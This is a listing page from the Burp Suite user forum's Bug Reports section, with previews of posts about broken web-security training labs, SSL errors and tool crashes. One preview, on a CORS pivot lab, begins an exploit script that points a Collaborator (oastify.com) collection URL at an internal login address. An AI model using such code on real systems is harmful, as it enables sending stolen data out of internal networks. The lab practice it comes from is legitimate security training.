Burp Suite User Forum


Burp Collaborator Default Servers Showing SSL Issue

Hi folks, When I (and other colleagues) run "Health Check" for Burp Collaborator on v2023.4.3 we are getting a significant amount of errors rendering Default Collaborator not functional. Is this a known issue affecting...

Last updated: May 22, 2023 08:32AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

No category "Gifts" on website

The lab revolves around a SQL injection on the category "Gifts", but there is none. https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data

Last updated: May 22, 2023 08:03AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Lab: HTTP request smuggling, basic TE.CL vulnerability

I tried to solve it myself several times, then your decision, and then as in the video. Nothing helps

Last updated: May 22, 2023 07:59AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

No more activations allowed

Hi Team, I am trying to reactivate my Burp Pro license several times on my different machines due to environmental issues. I am unable to reactivate as I am getting "No more activations allowed for this license" message....

Last updated: May 22, 2023 07:36AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Lab Bug

I am facing trouble with 'Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft' lab. Firstly, somehow lab asks me to 'Make the database retrieve the string: '8.0.32-0ubuntu0.20.04.2'' when...

Last updated: May 21, 2023 07:58AM UTC | 1 Agent replies | 1 Community replies | Bug Reports

Workaround for Java errors opening Burp on a secondary display on Linux

I encountered this and worked through it before I could blame Burp, so I want to post about it here for search-engine happiness. Using openjdk-17 on Linux with multiple monitors, Burp will start just fine on the first...

Last updated: May 19, 2023 09:04AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

TE.CL smuggling labs - official solutions do not work

The following labs don't seem to work / work stably. https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl https://portswigger.net/web-security/request-smuggling/lab-obfuscating-te-header To reproduce...

Last updated: May 19, 2023 07:30AM UTC | 1 Agent replies | 3 Community replies | Bug Reports

Getting the below error message only when I connect through Burp proxy, happens for all sites

I HAVE generated the Burp certificate and loaded it into the browser (Firefox, Burp and Chrome) - problem persists. Yelp! The 'peer' in this case would be the Burp Proxy listener. Thanks. Secure Connection...

Last updated: May 19, 2023 07:00AM UTC | 2 Agent replies | 1 Community replies | Bug Reports

Built in Chromium browser crashes after computer goes into sleep

On Windows 11 every time the computer goes into sleep mode the built in Chromium browser crashes. When opened again it shows a message that the browser was not closed properly and if I want to restore the session.

Last updated: May 18, 2023 09:11PM UTC | 2 Agent replies | 3 Community replies | Bug Reports

Has anyone else noticed the bundled Chrome browser hangs on recent releases?

Running v2023.3.4 at the moment but noticed it started around v2023.x. This is on latest patched Windows 10 release. Seems to occur almost randomly however running DOM Invader with prototype pollution with Scan for...

Last updated: May 17, 2023 07:55AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

SSL Errors

Hi, it's me again. I've tried your solution to connect to the same website (the one of yves) but I still encounter SSL problems. I've also installed the certificate on my phone and it doesn't help. I've also written to your...

Last updated: May 17, 2023 07:27AM UTC | 5 Agent replies | 6 Community replies | Bug Reports

Lab: CORS vulnerability with internal network pivot attack

The LAB doesn't work, so I tried it myself, because we overestimate it, it doesn't work !! <script> bu_url = 'https://' + 'pf8ramweqox3mawt6h1l1w6v3m9ex3.oastify.com'; url = `http://192.168.0.135:8080/login`; ...

Last updated: May 16, 2023 09:21PM UTC | 1 Agent replies | 1 Community replies | Bug Reports

False Positives For Dependency confusion because of extra character...

To whom it may concern, When opening a package-lock.json file in the browser with Burp running, Burp Suite falsely identifies a HIGH vulnerability known as Dependency Confusion every time... This is occurring because the "{"...

Last updated: May 15, 2023 04:19PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Every time crashes the lab "Reflected XSS with some SVG markup allowed" when payloading it

Hello, I have an issue when I'm trying to do payloading to find XSS valid tags into "<>" tags. Every time when I try to use Intruder to act the "Sniper" type of attack the server of this lab...

Last updated: May 15, 2023 01:14PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

In app browser fails to launch (Burp 2023.3.5/Java 17/Kali Linux)

Clicking the open browser buttons in the proxy tab or target tab has no impact, nothing shows up in diagnostics. When using health check for Burp's browser, the Checking headless browser gives this error: Aborting checks...

Last updated: May 15, 2023 07:08AM UTC | 1 Agent replies | 1 Community replies | Bug Reports

Collaborator makes GET request to collaborator payload in User-Agent string

While testing a CRLF based header injection on an application I noticed that collaborator will make GET requests to any *.oastify.com hostname specified in the User-Agent header. For example, given the following...

Last updated: May 11, 2023 01:35PM UTC | 2 Agent replies | 0 Community replies | Bug Reports

Cache Poisoning Labs

I have been experiencing issues with the web cache poisoning labs the last couple days where the labs are not caching the HTTP responses at all. No matter how many times I resend the same basic requests (e.g. GET /), I...

Last updated: May 11, 2023 08:34AM UTC | 2 Agent replies | 3 Community replies | Bug Reports

Expert XXE challenge solvable in incorrect manner

Hello, While messing about with the "Expert" XXE Academy challenge ("Exploiting XXE to retrieve data by repurposing a local DTD"), I found that executing the same payload as the prior "Practitioner" challenge ("Exploiting...

Last updated: May 10, 2023 04:00PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Lab not working properly

I am doing the following lab https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-unkeyed-query But the response is not being cached, I have tried by sending a...

Last updated: May 10, 2023 01:21PM UTC | 2 Agent replies | 1 Community replies | Bug Reports

Burp suite is showing protocol error

When I tried using the lab for SQLi, Burp Suite kept throwing me a protocol error. I tried that by using Firefox and the lab is working and didn't give me an error. Please resolve this issue.

Last updated: May 09, 2023 04:16PM UTC | 2 Agent replies | 2 Community replies | Bug Reports
